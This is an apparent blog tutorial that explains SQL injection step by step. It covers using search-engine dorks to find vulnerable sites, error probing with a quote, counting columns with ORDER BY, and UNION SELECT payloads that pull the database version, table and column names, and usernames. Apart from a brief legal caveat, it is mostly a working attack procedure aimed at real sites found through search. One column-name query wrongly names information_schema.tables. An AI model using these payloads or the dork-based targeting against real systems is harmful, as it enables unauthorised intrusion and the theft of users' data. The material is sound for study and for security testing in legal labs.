IMPORTANT: It should be noted that the very act of attempting an SQL injection on a site without the owners permission could result in very serious consequences if caught. The information contained below is written in the belief that information should be free and I leave it for the reader to use it as they wish. If you are looking for somewhere to practise, there are sites that will legally allow you to do so, Altoro Mutual and Hack This Site being two examples.
You may have noticed websites have a lot of information on them. To help manage all this data, sites use databases to store it in. This enables the data to be organised and then quickly retrieved and presented onto a webpage when requested by a visitor to the site.
To help explain, lets imagine a library, where all the books are organised and stored in bookcases according to the libraries system. When a visitor requests a book, the librarian can then quickly go to the relevant bookcase for that title, and after a quick search return the book as requested.
Just as libraries need to order their collection of items, websites need to manage their data using databases. Databases are organised into a series of different tables which are much like a spreadsheet, using columns to contain various data such as that of products like video consoles for sale, seen below.
SQL is a language created specifically for managing databases and is used across the web. If you’ve ever been on the internet, you’ve probably used SQL before even if you didn’t know it. Whenever you click a button or enter a search query, an SQL query is sent straight to the database for that site to find what you’re looking for.
That’s great, but I thought this was about hacking?
Most website ‘hacks’ are done through what is known as SQL injection, this involves modifying SQL commands sent to the database in order to retrieve other information that may not be publicly visible, such as usernames and passwords.
When you normally use a website, you send a command that may be something like this
SELECT data FROM table
SQL injection involves adding or ‘injecting’ extra bits of SQL code in order to extract private information from the database and even bypass security authentication such as logging in without even having to know a users password.
But how do you start typing in code? There isn’t exactly a terminal window to start entering commands into, right? Well actually every user input on a website poses a potential attack point to a hacker where code can be injected. This can be a login box, a search form or even the URL bar of the browser itself.
Finding Vulnerable Sites using Google Dorks
The only reason hackers are successful is because of poor security. SQL injection isn’t even hard to defend against but despite this many sites are still vulnerable. To help discover these sites we can use our friend, the search engine. We can then look for a specific URL syntax in our search by using what are known as ‘Google Dorks’ to help us find vulnerable sites by using operators such as “inurl:” to target specific content, for example:
Would only find us sites with the above as part of their URL, these are just a few examples of many, you can do a quick search to find hundreds more to use. A few more here to get you started.
You can then start testing to see how vulnerable the site is, by causing errors and then seeing how the site reacts.
To do this, all we’re going to do is simply add a single quotation mark to the end of a url after the number
If the site is properly secure then nothing will happen, however if it is vulnerable the site will generate an SQL error report onto the screen or just fail to properly generate the page..
Awesome, but what just happened?
To help understand lets look at the command being used normally.
SELECT * FROM 'articles' WHERE articleID='15'
This works fine, but looks what happens when we entered the single quotation mark
SELECT * FROM 'articles' WHERE articleID='15''
Notice the extra mark at the end of the line? That’s what we added and in doing so malformed the query by closing off the quotes before the program expected, leaving an extra quotation mark, which caused it to crash, if you did see get an error report it will probably look something like this:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/'' line 1
Oh dear, this is seriously bad news for any site as its not able to handle our input, making it vulnerable to an attack. That would be terrible.
Probing the Database
At this point we’re still completely blind about how the database is structured. Before we can do anything else we need to understand how many columns it has, without this information we will not be able to get anywhere.
To find this out we will use the “Order By” statement, followed by an SQL comment “–” so the rest of the line is ignored. This will then output the columns and order them by the number given. We want to keep repeating this until we generate an error, for example:
|example.com/article.php?id=15 order by 1––||No, error. Try higher number|
|example.com/article.php?id=15 order by 7––||Error/Crashed. Try lower number|
|example.com/article.php?id=15 order by 6––||No error. This is the highest number|
You then keep following this process until you find the highest number at which the site outputs correctly. Such as in the above example.
This is the amount of columns the table has.
Extracting Data (1)
Now we’ll use the information we learned to help our SQL injection using the “Union” statement. This is used to concatenate extra rows to be output.
union all select 1,2,3,4,5,6--
If you see any numbers appearing on-screen then congratulations – the query successfully generated another row. Otherwise you might need to invalidate the original query (and replace it with our own) to get it to work. The easiest way to do this is by simply adding a minus sign before the number, here are a few combinations you may need to try.
-15 union all select 1,2,3,4,5,6--
-15 and false union all select 1,2,3,4,5,6--
null union all select 1,2,3,4,5,6--
Hopefully you should now be seeing some numbers. Typically you’ll the title or body of a page replaced with a 1, 2 or 3.
We can then replace the numbers with other data we want to be output, such as the version of the database (assuming the number 2 is being displayed on-screen, this is what we will replace):
-15 union all select 1,version(),3,4,5,6--
And there we have it, our first successful data extraction, the version number of the database system.
However before we can start pulling any more data from the table we need to know where everything is, most importantly the table and column names.
Finding Table Names
To do this we use the following.
-15 union all select 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--
This may seem complicated, but its essentially pretty similar to what we did before. Except this time we are getting data from the information schema which contains information on the database, including the names of every table and column inside it.
You will then see the name of a table from the database output to the screen.
You can then cycle through these using “limit” to specify what you want to see.
-15 union all select 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database() limit 0,1--
-15 union all select 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database() limit 1,1--
-15 union all select 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database() limit 2,1--
Etc. You get the idea
Finding Column Names
Now for the column names, it’s as simple as:
-15 union all select 1,column_name,3,4,5,6 from information_schema.tables where table_schema=database() and table_name='xyz' limit 0,1--
Obviously changing ‘xyz’ to the name of the table you want the information from.
Extracting Data (2)
Once you have all the database information you can begin to extract specific information.
For example, say we wanted all the usernames from a table called users we would enter.
-15 union all select 1,username,3,4,5,6 from users limit 0,1--
And that… Is how to perform an SQL injection attack.
That’s all for now, thanks for reading.